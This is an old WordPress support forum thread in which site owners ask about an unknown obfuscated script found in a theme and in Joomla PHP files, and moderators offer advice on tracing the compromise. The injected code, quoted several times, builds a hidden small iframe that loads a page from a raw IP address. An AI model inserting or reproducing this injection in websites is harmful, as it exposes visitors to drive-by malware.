unknown script

  • presasportiva

    (@presasportiva)


    15 years, 3 months ago

    What’s this for ???

    <script>
z1=document.createElement("if"+String.fromCharCode(114)+"ame");
sz=String.fromCharCode(60-11);
z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"178.86."+"0.137/in."+"cgi?def"+"ault");
z1.setAttribute("wid"+"th",sz);
z1.setAttribute("heig"+"ht",sz);
function zp(zb){document.body.appendChild(zb);}
void(zp(z1));
</script><script>
z1=document.createElement("if"+String.fromCharCode(114)+"ame");
sz=String.fromCharCode(60-11);
z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"178.86."+"0.137/in."+"cgi?def"+"ault");
z1.setAttribute("wid"+"th",sz);
z1.setAttribute("heig"+"ht",sz);
function zp(zb){document.body.appendChild(zb);}
void(zp(z1));
</script>

Viewing 13 replies - 1 through 13 (of 13 total)
  • Samuel B

    (@samboll)

    15 years, 3 months ago

    got me
    where is it?

    mostanser

    (@mostanser)

    15 years, 3 months ago

    I have got the same script in one of the Joomla site that I was working in many PHP files. What is this? I found

    <script>
z1=document.createElement("if"+String.fromCharCode(114)+"ame");
sz=String.fromCharCode(60-11);
z1.setAttribute("s"+String.fromCharCode(114)+"c","http://"+"178.86."+"0.137/in."+"cgi?def"+"ault");
z1.setAttribute("wid"+"th",sz);
z1.setAttribute("heig"+"ht",sz);
function zp(zb){document.body.appendChild(zb);}
void(zp(z1));
</script>

    Is this a virus?

    mostanser

    (@mostanser)

    15 years, 3 months ago

    anybody got any reason of this yet?

    Moderator Kathryn Presner

    (@zoonini)

    15 years, 3 months ago

    Have you tried searching your local copy of the site to see exactly which file this is coming from? Or is it only showing on the server?

    If you don’t have a local copy of the site, I’d download the entire site to a temporary folder on your hard drive and do a search there. Knowing which file this is in will help narrow down the issue.

    mostanser

    (@mostanser)

    15 years, 3 months ago

    zoonini wrote:

    Have you tried searching your local files to see exactly which file this is coming from? Or is it only showing on the server?
    If you only have a copy of the site on the server, I’d download the entire site to a temporary folder on your hard drive and do a search there. Knowing which file this is in will help narrow down the issue.

    It was in a live site and was running properly. Suddenly today it happened. I had to delete all files unfortunately as a matter of urgent restoring. But it had been found in many PHP files in the entire Joomla site.

    thanks

    Moderator Kathryn Presner

    (@zoonini)

    15 years, 3 months ago

    Mostanser – so you’re saying the moment this code appeared your site stopped working? Sounds like something malicious, then, though I can’t find any online sources to verify this.

    mostanser

    (@mostanser)

    15 years, 3 months ago

    zoonini wrote:

    Mostanser – so you’re saying the moment this code appeared your site stopped working? Sounds like something malicious, then, though I can’t find any online sources to verify this.

    correct, just wondering if anyone else got this issue. I see the member “presasportiva” got the same issue (may be) in wordpress. Just wanted to monitor its activity.

    thanks

    Moderator Kathryn Presner

    (@zoonini)

    15 years, 3 months ago

    Mostanser – I would go through this checklist over at the Joomla! forums, if you haven’t already:

    Has your site been compromised? READ THIS
    http://forum.joomla.org/viewtopic.php?f=432&t=335090

    Presasportiva – are you running the latest version of WP? Do you have any security plug-ins installed?

    I recommend WordPress File Monitor as it emails you the moment a file has changed (added/edited/deleted) on the server, which can help you act on and trace malicious activity more easily and quickly.

    http://wordpress.org/extend/plugins/wordpress-file-monitor/

    Thread Starter presasportiva

    (@presasportiva)

    15 years, 3 months ago

    that’s a script in my wordpress template…modularity version 2.5

    after the upgrade of latest version of wordpress my template crashes…

    or i’ve been hacked…i don’t know yet…

    Thread Starter presasportiva

    (@presasportiva)

    15 years, 3 months ago

    zoonini thank you very much ! i will install it asap as i find the problem…because all the over templates works fine…despite the Modularity one…

    thank you

    Gogi2

    (@gogi2)

    15 years, 3 months ago

    I have a site a Двери в Витебске and Гранд кафе, it on CMS DLE, my question, whether I can transfer it on CMS WORPRESS, I should leave design same, both the structure of a site and the menu too should remain same.
    P.S. Sorry for my level of English
    thank you

    Moderator Kathryn Presner

    (@zoonini)

    15 years, 3 months ago

    Hi Presaportiva – if that script is right in the theme files, I strongly suggest you contact the makers of Modularity and ask them directly about it.

    Gogi2 – I suggest you start a new thread for your question as it’s a totally new issue and will get lost here. Thanks!

    gizzy

    (@gizzy)

    15 years, 3 months ago

    Yes we have recieved this in the last few days, its a virus.

    We still have not recovered

    http://vuegame.com

    as you can see. by the way if youve got more sites, they will have hacked them too

Viewing 13 replies - 1 through 13 (of 13 total)

The topic ‘unknown script’ is closed to new replies.